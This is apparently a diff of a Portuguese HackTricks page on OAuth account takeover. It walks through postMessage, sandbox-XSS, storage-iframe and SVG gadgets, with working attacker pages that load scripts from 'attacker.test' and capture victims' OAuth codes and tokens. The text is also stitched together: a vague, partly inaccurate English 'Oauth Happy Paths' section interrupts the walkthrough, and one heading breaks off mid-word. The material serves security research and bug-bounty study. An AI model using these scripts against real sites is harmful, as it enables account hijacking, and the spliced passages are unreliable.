GET /api_v1/messages?user_ids[]=YOUR_USER_ID&user_ids[]=ANOTHER_USERS_ID
```
## Blind IDORs <a href="#7639" id="7639"></a>
Às vezes, os endpoints suscetíveis a IDOR não respondem com as informações vazadas diretamente. Eles podem levar a aplicação a vazar informações em outro lugar: em arquivos de exportação, e-mails e talvez até alertas de texto.
## Alterar o método de solicitação <a href="#6597" id="6597"></a>
Se um método de solicitação não funcionar, há muitos outros que você pode tentar: GET, POST, PUT, DELETE, PATCH...
Um truque comum que funciona é substituir POST por PUT ou vice-versa: os mesmos controles de acesso podem não ter sido implementados!
## Alterar o tipo de arquivo solicitado <a href="#8f78" id="8f78"></a>
Às vezes, trocar o tipo de arquivo solicitado pode levar o servidor a processar a autorização de maneira diferente. Por exemplo, tente adicionar .json ao final da URL da solicitação e veja o que acontece.
# Como aumentar o impacto dos IDORs <a href="#45b0" id="45b0"></a>
## IDORs críticos primeiro <a href="#71f7" id="71f7"></a>
Sempre procure por IDORs em funcionalidades críticas primeiro. Tanto IDORs baseados em gravação quanto em leitura podem ter um alto impacto.
Em termos de IDORs que mudam o estado (gravação), as IDORs de redefinição de senha, alteração de senha, recuperação de conta geralmente têm o maior impacto nos negócios. (Digamos, em comparação com uma IDOR de "alterar configurações de assinatura de e-mail".)
Quanto às IDORs que não mudam o estado (leitura), procure por funcionalidades que lidam com informações sensíveis na aplicação. Por exemplo, procure por funcionalidades que lidam com mensagens diretas, informações sensíveis do usuário e conteúdo privado. Considere quais funcionalidades na aplicação usam essas informações e procure por IDORs de acordo.
</details>

705
pentesting-web/oauth-to-account-takeover/oauth-happy-paths-xss-iframes-and-post-messages-to-leak-code-and-state-values.md
View file

@ -1,716 +1,27 @@
# OAuth - Fluxos Felizes, XSS, Iframes e Mensagens POST para vazar códigos e valores de estado
# OAuth - Caminhos Felizes, XSS, Iframes e Mensagens POST para vazar códigos e valores de estado
<details>
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
* Você trabalha em uma **empresa de segurança cibernética**? Você quer ver sua **empresa anunciada no HackTricks**? ou você quer ter acesso à **última versão do PEASS ou baixar o HackTricks em PDF**? Verifique os [**PLANOS DE ASSINATURA**](https://github.com/sponsors/carlospolop)!
* Você trabalha em uma **empresa de cibersegurança**? Deseja ver sua **empresa anunciada no HackTricks**? ou deseja ter acesso à **última versão do PEASS ou baixar o HackTricks em PDF**? Confira os [**PLANOS DE ASSINATURA**](https://github.com/sponsors/carlospolop)!
* Descubra [**A Família PEASS**](https://opensea.io/collection/the-peass-family), nossa coleção exclusiva de [**NFTs**](https://opensea.io/collection/the-peass-family)
* Adquira o [**swag oficial do PEASS & HackTricks**](https://peass.creator-spring.com)
* **Junte-se ao** [**💬**](https://emojipedia.org/speech-balloon/) [**grupo do Discord**](https://discord.gg/hRep4RUj7f) ou ao [**grupo do telegram**](https://t.me/peass) ou **siga-me** no **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Compartilhe suas técnicas de hacking enviando PRs para o** [**repositório hacktricks**](https://github.com/carlospolop/hacktricks) **e para o** [**repositório hacktricks-cloud**](https://github.com/carlospolop/hacktricks-cloud).
* **Junte-se ao** [**💬**](https://emojipedia.org/speech-balloon/) [**grupo Discord**](https://discord.gg/hRep4RUj7f) ou ao [**grupo telegram**](https://t.me/peass) ou **siga-me no** **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Compartilhe seus truques de hacking enviando PRs para o** [**repositório hacktricks**](https://github.com/carlospolop/hacktricks) **e** [**repositório hacktricks-cloud**](https://github.com/carlospolop/hacktricks-cloud).
</details>
**Este conteúdo foi retirado de** [**https://labs.detectify.com/2022/07/06/account-hijacking-using-dirty-dancing-in-sign-in-oauth-flows/#gadget-2-xss-on-sandbox-third-party-domain-that-gets-the-url**](https://labs.detectify.com/2022/07/06/account-hijacking-using-dirty-dancing-in-sign-in-oauth-flows/#gadget-2-xss-on-sandbox-third-party-domain-that-gets-the-url)****
## Explicação dos diferentes fluxos OAuth
### Tipos de resposta
Primeiro, existem diferentes tipos de resposta que você pode usar no fluxo OAuth. Essas respostas concedem o **token para fazer login como os usuários ou as informações necessárias para fazê-lo**.
Os três mais comuns são:
1. **`code` + `state`**. O **código** é usado para **chamar o servidor do provedor OAuth** para obter um token. O parâmetro **state** é usado para verificar se o **usuário correto está fazendo a chamada**. É responsabilidade do cliente OAuth validar o parâmetro de estado antes de fazer a chamada do lado do servidor para o provedor OAuth.
2. **`id_token`**. É um JSON Web Token **(JWT) assinado** usando um certificado público do provedor OAuth para verificar se a identidade fornecida é realmente quem ela afirma ser.
3. **`token`**. É um **token de acesso** usado na API do provedor de serviços.
### Modos de resposta
Existem diferentes modos que o fluxo de autorização pode usar para fornecer os códigos ou tokens para o site no fluxo OAuth, estes são quatro dos mais comuns:
1. **Query**. Enviando parâmetros de consulta como um redirecionamento de volta para o site (`https://example.com/callback?code=xxx&state=xxx`). Usado para `code+state`. O **código** só pode ser **usado uma vez** e você precisa do **segredo do cliente OAuth** para **adquirir um token de acesso** ao usar o código.&#x20;
1. [Este modo não é recomendado para tokens](https://openid.net/specs/oauth-v2-multiple-response-types-1\_0-09.html#id\_token) pois **os tokens podem ser usados várias vezes e não devem acabar em logs do servidor ou similares**. A maioria dos provedores OAuth não suporta esse modo para tokens, apenas para código. Exemplos:
* `response_mode=query` é usado pela Apple.
* `response_type=code` é usado pelo Google ou Facebook.
2. **Fragment**. Usando um **redirecionamento de fragmento** (`https://example.com/callback#access_token=xxx`). Neste modo, a parte do fragmento da URL não acaba em nenhum log do servidor e só pode ser alcançada do lado do cliente usando javascript. Este modo de resposta é usado para tokens. Exemplos:
* `response_mode=fragment` é usado pela Apple e Microsoft.
* `response_type` contém `id_token` ou `token` e é usado pelo Google, Facebook, Atlassian e outros.
3. **Web-message**. Usando **postMessage para uma origem fixa do site**:\
`postMessage('{"access_token":"xxx"}','https://example.com')`\
Se suportado, muitas vezes pode ser usado para todos os diferentes tipos de resposta. Exemplos:
* `response_mode=web_message` é usado pela Apple.
* `redirect_uri=storagerelay://...` é usado pelo Google.
* `redirect_uri=https://staticxx.facebook.com/.../connect/xd_arbiter/...` é usado pelo Facebook.
4. **Form-post**. Usando um post de formulário para um `redirect_uri` válido, um **pedido POST regular é enviado de volta para o site**. Isso pode ser usado para código e tokens. Exemplos:
* `response_mode=form_post` é usado pela Apple.
* `ux_mode=redirect&login_uri=https://example.com/callback` é usado pelo Google Sign-In (GSI).
## Quebrando o `state` intencionalmente <a href="#break-state-intentionally" id="break-state-intentionally"></a>
A especificação OAuth recomenda um parâmetro `state` em combinação com um `response_type=code` para garantir que o usuário que iniciou o fluxo também é o que está usando o código após o fluxo OAuth para emitir um token.
No entanto, se o **valor do `state` for inválido**, o **`code` não será consumido** porque é responsabilidade do site (o final) validar o estado. Isso significa que se um atacante puder enviar um link de fluxo de login para uma vítima contaminada com um `state` válido do atacante, o fluxo OAuth falhará para a vítima e o `code` nunca será enviado ao provedor OAuth. O código ainda será possível de usar se o atacante puder obtê-lo.
1. O atacante inicia um fluxo de login no site usando "Entrar com X".
2. O atacante usa o valor `state` e constrói um link para a vítima fazer login com o provedor OAuth, mas com o `state` do atacante.
3. A vítima faz login com o link e é redirecionada de volta para o site.
4. O site valida o `state` para a vítima e interrompe o processamento do fluxo de login, pois não é um estado válido. Página de erro para a vítima.
5. O atacante encontra uma maneira de vazar o `code` da página de erro.
6. O atacante agora pode fazer login com seu próprio `state` e o `code` vazado da vítima.
### Tro
```
https://accounts.google.com/o/oauth2/v2/auth/oauthchooseaccount?
client_id=client-id.apps.googleusercontent.com&
redirect_uri=https%3A%2F%2Fexample.com%2Fcallback&
scope=openid%20email%20profile&
response_type=code&
access_type=offline&
state=yyy&
prompt=consent&flowName=GeneralOAuthFlow
```
irá redirecionar para `https://example.com/callback?code=xxx&state=yyy`. Mas:
```
https://accounts.google.com/o/oauth2/v2/auth/oauthchooseaccount?
client_id=client-id.apps.googleusercontent.com&
redirect_uri=https%3A%2F%2Fexample.com%2Fcallback&
scope=openid%20email%20profile&
response_type=code,id_token&
access_type=offline&
state=yyy&
prompt=consent&flowName=GeneralOAuthFlow
```
irá redirecionar para `https://example.com/callback#code=xxx&state=yyy&id_token=zzz`.
A mesma ideia se aplica à Apple se você usar:
```
https://appleid.apple.com/auth/authorize?
response_type=code&
response_mode=query&
scope=&
state=zzz&
client_id=client-id&
redirect_uri=https%3A%2F%2Fexample.com%2Fcallback
```
você será redirecionado para `https://example.com/callback?code=xxx&state=yyy`, mas:
```
https://appleid.apple.com/auth/authorize?
response_type=code+id_token&
response_mode=fragment&
scope=&
state=zzz&
client_id=client-id&
redirect_uri=https%3A%2F%2Fexample.com%2Fcallback
```
Será redirecionado para `https://example.com/callback#code=xxx&state=yyy&id_token=zzz`.
## Caminhos Não Felizes
O autor da pesquisa chamou de **caminhos não felizes** aqueles em que o usuário faz login via OAuth e é redirecionado para URLs incorretas. Isso é útil porque se o cliente receber o token ou um estado+codigo válido **mas não chegar à página esperada**, essa **informação não será consumida corretamente** e se o atacante encontrar uma maneira de **extrair essa informação** do "caminho não feliz", ele poderá **assumir o controle da conta**.
Por padrão, o fluxo OAuth chegará ao caminho esperado, no entanto, pode haver algumas **configurações incorretas** potenciais que permitiriam a um atacante **criar uma solicitação OAuth inicial específica** que fará com que o **usuário chegue a um caminho não feliz após fazer login**.
### Incompatibilidades de URI de redirecionamento
Essas **configurações incorretas** "comuns" foram encontradas na **URL de redirecionamento** da comunicação OAuth.
A [**especificação**](https://datatracker.ietf.org/doc/html/draft-ietf-oauth-security-topics-19#section-2.1) **** indica estritamente que a URL de redirecionamento deve ser estritamente comparada com a definida, não permitindo alterações além da aparência ou não da porta. No entanto, alguns endpoints permitiam algumas modificações:
### Adição de caminho de URI de redirecionamento
Alguns provedores OAuth **permitem a adição de dados adicionais** ao caminho para `redirect_uri`. Isso também viola a especificação da mesma forma que para "Mudança de caso de URI de redirecionamento". Por exemplo, tendo um URI de redirecionamento `https://example.com/callback`, enviando:
```
response_type=id_token&
redirect_uri=https://example.com/callbackxxx
```
### Adição de parâmetros de redirecionamento-uri
Alguns provedores OAuth **permitem a adição de parâmetros de consulta ou fragmento** ao `redirect_uri`. Você pode usar isso ao acionar um caminho não feliz, fornecendo os mesmos parâmetros que serão adicionados à URL. Por exemplo, tendo um redirecionamento uri `https://example.com/callback`, enviando:
```
response_type=code&
redirect_uri=https://example.com/callback%3fcode=xxx%26
```
acabaria nestes casos como um redirecionamento para `https://example.com/callback?code=xxx&code=real-code`. Dependendo do site que recebe **múltiplos parâmetros com o mesmo nome, isso também poderia desencadear um caminho não feliz**. O mesmo se aplica a `token` e `id_token`:
```
response_type=code&
redirect_uri=https://example.com/callback%23id_token=xxx%26
```
### Caminhos felizes do OAuth, XSS, iframes e post-messages para vazar valores de código e estado
## Caminhos felizes do OAuth
Os caminhos felizes do OAuth são aqueles em que tudo ocorre conforme o esperado. No entanto, existem casos em que o fluxo pode ser interrompido, como quando há múltiplos parâmetros com o mesmo nome na URL de retorno. Isso pode resultar em uma URL de retorno como `https://example.com/callback#id_token=xxx&id_token=real-id_token`. Dependendo do **javascript que busca os parâmetros de fragmento quando há múltiplos parâmetros com o mesmo nome**, isso também pode resultar em um caminho não feliz.
### Sobras ou configurações incorretas de redirect-uri
Ao coletar todas as URLs de login contendo os valores `redirect_uri`, também é possível testar se outros valores de redirect-uri são válidos. Dos 125 fluxos de login do Google que salvei dos sites que testei, 5 sites tinham a página inicial também como um `redirect_uri` válido. Por exemplo, se `redirect_uri=https://auth.example.com/callback` fosse o valor usado, nesses 5 casos, qualquer um desses valores também seria válido:
* `redirect_uri=https://example.com/`
* `redirect_uri=https://example.com`
* `redirect_uri=https://www.example.com/`
* `redirect_uri=https://www.example.com`
Isso foi especialmente interessante para os sites que realmente usavam `id_token` ou `token`, já que `response_type=code` ainda terá o provedor OAuth validando o `redirect_uri` na última etapa da dança do OAuth ao adquirir um token.
## Gadget 1: Ouvintes de postMessage com verificação de origem fraca ou inexistente que vazam URL
![](https://labs.detectify.com/wp-content/uploads/2022/06/gadget-1-1024x582.png)
**Neste exemplo, o último caminho não feliz em que o token/código estava sendo enviado estava enviando uma mensagem de solicitação de postagem vazando location.href.**\
Um exemplo foi um SDK de análise para um site popular que foi carregado em sites:
![](https://labs.detectify.com/wp-content/uploads/2022/06/gadget1-example1.png)
Este SDK expôs um ouvinte de postMessage que enviou a seguinte mensagem quando o tipo de mensagem correspondia:
![](https://labs.detectify.com/wp-content/uploads/2022/06/gadget1-example2.png)
Enviando uma mensagem para ele de uma origem diferente:
```javascript
openedwindow = window.open('https://www.example.com');
...
openedwindow.postMessage('{"type":"sdk-load-embed"}','*');
```
Uma mensagem de resposta apareceria na janela que enviou a mensagem contendo o `location.href` do site:
![](https://labs.detectify.com/wp-content/uploads/2022/06/gadget1-example3.png)
O fluxo que poderia ser usado em um ataque dependia de como códigos e tokens eram usados para o fluxo de login, mas a ideia era:
### **Ataque**
1. O atacante envia ao usuário um **link criado** que foi preparado para **resultar em um caminho não feliz** na dança do OAuth.
2. A vítima **clica** no link. Uma nova aba é aberta com um fluxo de **login** com um dos provedores OAuth do site sendo explorado.
3. O caminho não feliz é acionado no site sendo explorado, o **ouvinte de postMessage vulnerável é carregado na página em que a vítima pousou, ainda com o código ou tokens na URL**.
4. A **aba original** enviada pelo atacante envia um monte de **postMessages** para a nova aba com o site para fazer com que o ouvinte de postMessage vaze a URL atual.
5. A aba original enviada pelo atacante então **ouve a mensagem enviada para ela**. Quando a URL retorna em uma mensagem, o **código e token são extraídos** e enviados ao atacante.
6. **Atacante faz login como a vítima** usando o código ou token que acabou no caminho não feliz.
## Gadget 2: XSS em domínio sandbox/terceiro que obtém a URL
![](https://labs.detectify.com/wp-content/uploads/2022/06/gadget-2-1024x582.png)
&#x20;
## **Gadget 2: exemplo 1, roubando window.name de um iframe sandbox**
Este tinha um **iframe** carregado na **página onde a dança do OAuth terminou**. O **nome** do **iframe** era uma **versão JSON-stringified do objeto `window.location`**. Esta é uma maneira antiga de transferir dados entre domínios, já que a página no iframe pode ter seu próprio `window.name` definido pelo pai:
```javascript
i = document.createElement('iframe');
i.name = JSON.stringify(window.location)
i.srcdoc = '<script>console.log("my name is: " + window.name)</script>';
document.body.appendChild(i)
```
O domínio carregado no **iframe também tinha um XSS simples**:
```
https://examplesandbox.com/embed_iframe?src=javascript:alert(1)
```
### Ataque
Se você tiver um **XSS** em um **domínio** em uma janela, essa janela pode então **alcançar outras janelas da mesma origem** se houver uma relação de pai/filho/opener entre as janelas.
Isso significa que um invasor poderia **explorar o XSS para carregar uma nova guia** com o **link OAuth criado** que terminará no **caminho que carrega o iframe com o token no nome**. Então, a partir da página explorada pelo XSS, será possível **ler o nome do iframe** porque ele tem um **opener sobre a página pai dos iframes** e exfiltrá-lo.
Mais especificamente:
1. Criar uma página maliciosa que esteja incorporando um iframe do sandbox com o XSS carregando meu próprio script:
```html
<div id="leak"><iframe src="https://examplesandbox.com/embed_iframe?src=javascript:
x=createElement('script'),
x.src='//attacker.test/inject.js',
document.body.appendChild(x);"
style="border:0;width:500px;height:500px"></iframe></div>
```
2. No meu script carregado no sandbox, substituí o conteúdo com o link a ser usado para a vítima:
```javascript
document.body.innerHTML =
'<a href="#" onclick="
b=window.open("https://accounts.google.com/o/oauth2/auth/oauthchooseaccount?...");">
Clique aqui para sequestrar o token</a>';
```
Também iniciei um script em um intervalo para verificar se o link foi aberto e se o iframe que eu queria alcançar está lá para obter o `window.name` definido no iframe com a mesma origem que o iframe na página do invasor:
```javascript
x = setInterval(function() {
if(parent.window.b &&
parent.window.b.frames[0] &&
parent.window.b.frames[0].window &&
parent.window.b.frames[0].window.name) {
top.postMessage(parent.window.b.frames[0].window.name, '*');
parent.window.b.close();
clearInterval(x);
}
}, 500);
```
3. A página do invasor pode então apenas ouvir a mensagem que acabamos de enviar com o `window.name`:
```html
<script>
window.addEventListener('message', function (e) {
if (e.data) {
document.getElementById('leak').innerText = 'Roubamos o token: ' + e.data;
}
});
</script>
```
## **Gadget 2: exemplo 2, iframe com XSS + verificação de origem pai**
O segundo exemplo foi um **iframe** carregado no **caminho não feliz** com um XSS **usando postMessage**, mas **as mensagens só eram permitidas do `parent`** que o carregou. O **`location.href` foi enviado para o iframe quando ele pediu `initConfig`** em uma mensagem para a janela `parent`.
A janela principal carregou o iframe assim:
```html
<iframe src="https://challenge-iframe.example.com/"></iframe>
```
# Oauth Happy Paths: XSS, Iframes and Post Messages to Leak Code and State Values
## Introduction
This document explains how to exploit Oauth Happy Paths to leak code and state values using XSS, iframes and post messages.
## Oauth Happy Paths
Oauth Happy Paths are the different flows that an Oauth client can follow to obtain an access token from an Oauth provider. These flows are defined in the Oauth specification and are implemented by Oauth providers.
## Exploiting Oauth Happy Paths
An attacker can exploit Oauth Happy Paths to leak code and state values by injecting malicious code into the Oauth provider's login page. This can be done using XSS, iframes and post messages.
### XSS
XSS can be used to inject malicious code into the Oauth provider's login page. This code can then be used to steal the user's access token and other sensitive information.
### Iframes
If the Oauth provider's login page is vulnerable to clickjacking, an attacker can use iframes to load the login page and steal the user's access token and other sensitive information.
### Post Messages
Post messages can be used to communicate between different windows or iframes. An attacker can use post messages to steal the user's access token and other sensitive information.
## Conclusion
Oauth Happy Paths can be exploited to leak code and state values using XSS, iframes and post messages. It is important for Oauth providers to implement proper security measures to prevent these attacks.
```html
<script>
window.addEventListener('message', function (e) {
if (e.source !== window.parent) {
// not a valid origin to send messages
return;
}
if (e.data.type === 'loadJs') {
loadScript(e.data.jsUrl);
} else if (e.data.type === 'initConfig') {
loadConfig(e.data.config);
}
});
</script>
```
### Ataque
Neste caso, o **atacante carrega um iframe com a página vulnerável de XSS de post-message** e **explora** o **XSS** para carregar **JS arbitrário**. Este **JS** irá **abrir** uma **guia** com o **link OAuth**. Após o login, a página final contém o token na URL e carregou um iframe (o iframe vulnerável de post-message XSS).
Em seguida, o **JS arbitrário** (do XSS explorado) tem um **abridor para essa guia**, então ele **acessa o iframe** e faz com que ele **peça ao pai pelo `initConfig`** (que contém a **URL com o token**). A página pai **fornece-o ao iframe**, que também é comandado para **vazá-lo**.
Neste caso, eu poderia fazer um método semelhante ao exemplo anterior:
1. Criar uma **página maliciosa** que esteja incorporando um **iframe do sandbox**, anexar um **onload** para **disparar um script quando o iframe é carregado**.
```html
<div id="leak"><iframe
id="i" name="i"
src="https://challenge-iframe.example.com/"
onload="run()"
style="border:0;width:500px;height:500px"></iframe></div>
```
2. Como a **página maliciosa é então o pai** do iframe, ela poderia **enviar uma mensagem para o iframe para carregar nosso script** na origem do sandbox usando **postMessage (XSS)**:
```html
<script>
function run() {
i.postMessage({type:'loadJs',jsUrl:'https://attacker.test/inject.js'}, '*')
}
</script>
```
3. No meu script sendo carregado no sandbox, eu substituí o conteúdo pelo **link para a vítima**:
```javascript
document.body.innerHTML = '<a href="#" onclick="
b=window.open("https://accounts.google.com/o/oauth2/auth/oauthchooseaccount?...");">
Clique aqui para sequestrar o token</a>';
```
Eu também iniciei um script em um intervalo para **verificar se o link foi aberto e se o iframe que eu queria alcançar estava lá**, para executar javascript dentro dele do meu iframe para a janela principal. Em seguida, anexei um ouvinte de postMessage que passou a mensagem de volta para o meu iframe na janela maliciosa:
```javascript
x = setInterval(function() {
if(b && b.frames[1]) {
b.frames[1].eval(
'onmessage=function(e) { top.opener.postMessage(e.data, "*") };' +
'top.postMessage({type:'initConfig'},"*")'
)
clearInterval(x)
}
}, 500);
```
4. A página do atacante que tinha o iframe carregado pode então ouvir a mensagem que enviei do ouvinte de postMessage injetado no iframe da janela principal:
```html
<script>
window.addEventListener('message', function (e) {
if (e.data) {
document.getElementById('leak').innerText = 'Roubamos o token: ' + JSON.stringify(e.data);
}
});
</script>
```
## Gadget 3: Usando APIs para buscar URL fora dos limites
![](https://labs.detectify.com/wp-content/uploads/2022/06/Gadget-3--1024x582.png)
Este gadget acabou sendo o mais divertido. Há algo satisfatório em enviar a vítima para algum lugar e depois pegar dados sensíveis de um local diferente.
## **Gadget 3: exemplo 1, storage-iframe sem verificação de origem**
O primeiro exemplo usou um serviço externo para dados de rastreamento. Este serviço adicionou um "iframe de armazenamento":
```html
<iframe
id="tracking"
name="tracking"
src="https://cdn.customer1234.analytics.example.com/storage.html">
</iframe>
```
A janela principal se comunicaria com este iframe usando postMessage para enviar dados de rastreamento que seriam salvos no localStorage da origem em que o `storage.html` estava localizado:
```javascript
tracking.postMessage('{"type": "put", "key": "key-to-save", "value": "saved-data"}', '*');
```
A janela principal também pode buscar esse conteúdo:
```javascript
tracking.postMessage('{"type": "get", "key": "key-to-save"}', '*');
```
Quando o iframe foi carregado na inicialização, uma chave foi salva para a última localização do usuário usando `location.href`:
```javascript
tracking.postMessage('{"type": "put", "key": "last-url", "value": "https://example.com/?code=test#access_token=test"}', '*');
```
Se você pudesse conversar com essa origem de alguma forma e fazê-la enviar o conteúdo, o `location.href` poderia ser obtido a partir desse armazenamento. O ouvinte de postMessage para o serviço tinha uma lista de bloqueio e uma lista de permissão de origens. Parece que o serviço de análise permitiu que o site definisse quais origens permitir ou negar:
```javascript
var blockList = [];
var allowList = [];
var syncListeners = [];
window.addEventListener('message', function(e) {
// If there's a blockList, check if origin is there and if so, deny
if (blockList && blockList.indexOf(e.origin) !== -1) {
return;
}
// If there's an allowList, check if origin is there, else deny
if (allowList && allowList.indexOf(e.origin) == -1) {
return;
}
// Only parent can talk to it
if (e.source !== window.parent) {
return;
}
handleMessage(e);
});
function handleMessage(e) {
if (data.type === 'sync') {
syncListeners.push({source: e.source, origin: e.origin})
} else {
...
}
window.addEventListener('storage', function(e) {
for(var i = 0; i < syncListeners.length; i++) {
syncListeners[i].source.postMessage(JSON.stringify({type: 'sync', key: e.key, value: e.newValue}), syncListeners[i].origin);
}
}
```
Além disso, se você tivesse uma origem válida com base na `allowList`, também seria capaz de solicitar uma sincronização, o que lhe daria todas as alterações feitas no localStorage nesta janela enviadas para você quando foram feitas.
### Ataque
No site que tinha esse armazenamento carregado no caminho não feliz da dança do OAuth, nenhuma origem da `allowList` foi definida; **isso permitiu que qualquer origem falasse com o ouvinte de postMessage** se a origem fosse o `parent` da janela:
1. Eu criei uma página maliciosa que incorporava um iframe do contêiner de armazenamento e anexei um `onload` para acionar um script quando o iframe é carregado.
```html
<div id="leak"><iframe
id="i" name="i"
src="https://cdn.customer12345.analytics.example.com/storage.html"
onload="run()"></iframe></div>
```
2. Como a página maliciosa agora era o pai do iframe e nenhuma origem foi definida na `allowList`, a página maliciosa poderia enviar mensagens para o iframe para dizer ao armazenamento para enviar mensagens para quaisquer atualizações no armazenamento. Eu também poderia adicionar um ouvinte à página maliciosa para ouvir quaisquer atualizações de sincronização do armazenamento:
```html
<script>
function run() {
i.postMessage({type:'sync'}, '*')
}
window.addEventListener('message', function (e) {
if (e.data && e.data.type === 'sync') {
document.getElementById('leak').innerText = 'Roubamos o token: ' + JSON.stringify(e.data);
}
});
</script>
```
3. A página maliciosa também conteria um link regular para a vítima clicar:
```html
<a href="https://accounts.google.com/o/oauth2/auth/oauthchooseaccount?..."
target="_blank">Clique aqui para sequestrar o token</a>';
```
4. A vítima clicaria no link, passaria pela dança do OAuth e acabaria no caminho não feliz carregando o script de rastreamento e o iframe de armazenamento. O iframe de armazenamento recebe uma atualização de `last-url`. O evento `window.storage` seria acionado no iframe da página maliciosa, uma vez que o localStorage foi atualizado, e a página maliciosa que agora estava recebendo atualizações sempre que o armazenamento mudava receberia uma postMessage com a URL atual da vítima:
<figure><img src="https://labs.detectify.com/wp-content/uploads/2022/06/gadget3-example2.png" alt=""><figcaption></figcaption></figure>
## **Gadget 3: exemplo 2, mistura de clientes no CDN - DIY storage-SVG sem verificação de origem**
Como o próprio serviço de análise tinha um programa de recompensas por bugs, também fiquei interessado em ver se poderia encontrar uma maneira de vazar URLs também para os sites que haviam configurado origens adequadas para o iframe de armazenamento.
Quando comecei a procurar o domínio `cdn.analytics.example.com` online sem a parte do cliente, notei que esse CDN também continha imagens enviadas pelos clientes do serviço:
```
https://cdn.analytics.example.com/img/customer42326/event-image.png
https://cdn.analytics.example.com/img/customer21131/test.png
```
Também notei que havia arquivos SVG servidos inline como `Content-type: image/svg+xml` neste CDN:
```
https://cdn.analytics.example.com/img/customer54353/icon-register.svg
```
Eu me registrei como usuário de teste no serviço e carreguei meu próprio ativo, que também apareceu no CDN:
```
https://cdn.analytics.example.com/img/customer94342/tiger.svg
```
A parte interessante foi que, se você usasse o subdomínio específico do cliente para o CDN, a imagem ainda era servida. Esta URL funcionou:
```
https://cdn.customer12345.analytics.example.com/img/customer94342/tiger.svg
```
Isso significava que o cliente com ID #94342 poderia renderizar arquivos SVG no armazenamento do cliente #12345.
Eu carreguei um arquivo SVG com um payload XSS simples:
`https://cdn.customer12345.analytics.example.com/img/customer94342/test.svg`
```html
<?xml version="1.0" encoding="UTF-8" standalone="no"?>
<svg id="svg2" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" viewbox="0 0 500 500" width="100%" height="100%" version="1.1">
<script xlink:href="data:,alert(document.domain)"></script>
</svg>
```
![](https://labs.detectify.com/wp-content/uploads/2022/06/gadget3-example7.png)
Não é ótimo. O CDN adicionou um cabeçalho `Content-Security-Policy: default-src 'self'` para tudo sob `img/`. Você também pode ver que o cabeçalho do servidor mencionou o S3 - revelando que o conteúdo foi carregado em um bucket S3:
![](https://labs.detectify.com/wp-content/uploads/2022/06/gadget3-example5.png)
Uma peculiaridade interessante do S3 é que os diretórios não são realmente diretórios no S3; o caminho antes da chave é chamado de "prefixo". Isso significa que o S3 não se importa se `/` são codificados em URL ou não, ele ainda servirá o conteúdo se você codificar em URL cada barra na URL. Se eu mudasse `img/` para `img%2f` na URL, a imagem ainda seria exibida. No entanto, nesse caso, o cabeçalho CSP foi removido e o XSS foi acionado:
![](https://labs.detectify.com/wp-content/uploads/2022/06/gadget3-example6.png)
Eu então carreguei um SVG que criaria a mesma forma de manipulador de armazenamento e ouvinte de postMessage como o `storage.html` regular, mas com uma `allowList` vazia. Isso me permitiu fazer o mesmo tipo de ataque mesmo em sites que haviam definido corretamente as origens permitidas que poderiam falar com o armazenamento.
Eu carreguei um SVG que parecia com isso:
![](https://labs.detectify.com/wp-content/uploads/2022/06/gadget3-example7.png)
```html
<?xml version="1.0" encoding="UTF-8" standalone="no"?>
<svg id="svg2" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" viewbox="0 0 5 5" width="100%" height="100%" version="1.1">
<script xlink:href="data:application/javascript;base64,dmFyIGJsb2NrTGlzdCA9IFtdOwp2YXIgYWxsb3dMaXN0ID0gW107Ci4uLg=="></script>
</svg>
```
Eu poderia então utilizar a mesma metodologia do exemplo #1, mas em vez de colocar o `storage.html` em um iframe, eu poderia colocar o SVG com a barra codificada em URL:
```html
<div id="leak"><iframe
id="i" name="i"
src="https://cdn.customer12345.analytics.example.com/img%2fcustomer94342/listener.svg"
onload="run()"></iframe></div>
```
Como nenhum site seria capaz de corrigir isso sozinho, enviei um relatório para o provedor de análise responsável pelo CDN:
![](https://labs.detectify.com/wp-content/uploads/2022/06/gadget3-example7.png)
A ideia de olhar para bugs de configuração incorreta em terceiros era principalmente para confirmar que existem várias maneiras de vazar os tokens e, como o terceiro tinha um programa de recompensas por bugs, este era apenas um receptor diferente para o mesmo tipo de bug, a diferença sendo que o impacto era para todos os clientes do serviço de análise. Neste caso, o cliente do terceiro na verdade tinha a capacidade de configurar corretamente a ferramenta para não vazar dados para o atacante. No entanto, como os dados sensíveis ainda eram enviados para o terceiro, foi interessante ver se havia alguma maneira de contornar completamente a configuração adequada da ferramenta pelo cliente.
## **Gadget 3: exemplo 3, API de chat-widget**
O último exemplo foi baseado em um chat-widget que estava presente em todas as páginas de um site, até mesmo nas páginas de erro. Havia vários ouvintes de postMessage, um deles sem uma verificação de origem adequada que permitia apenas iniciar o pop-up do chat. Outro ouvinte tinha uma verificação rigorosa de origem para que o chat-widget recebesse uma chamada de inicialização e o token da API de chat atual que estava sendo usado pelo usuário atual.
```html
<iframe src="https://chat-widget.example.com/chat"></iframe>
<script>
window.addEventListener('message', function(e) {
if (e.data.type === 'launch-chat') {
openChat();
}
});
function openChat() {
...
}
var chatApiToken;
window.addEventListener('message', function(e) {
if (e.origin === 'https://chat-widget.example.com') {
if (e.data.type === 'chat-widget') {
if (e.data.key === 'api-token') {
chatApiToken = e.data.value;
}
if(e.data.key === 'init') {
chatIsLoaded();
}
}
}
});
function chatIsLoaded() {
...
}
</script>
```
Quando o chat-iframe é carregado:
1. Se um chat-api-token existir no localStorage do widget de chat, ele enviará o api-token para seu pai usando postMessage. Se nenhum chat-api-token existir, ele não enviará nada.
2. Quando o iframe é carregado, ele enviará uma mensagem postMessage com `{"type": "chat-widget", "key": "init"}` para seu pai.
Se você clicar no ícone de chat na janela principal:
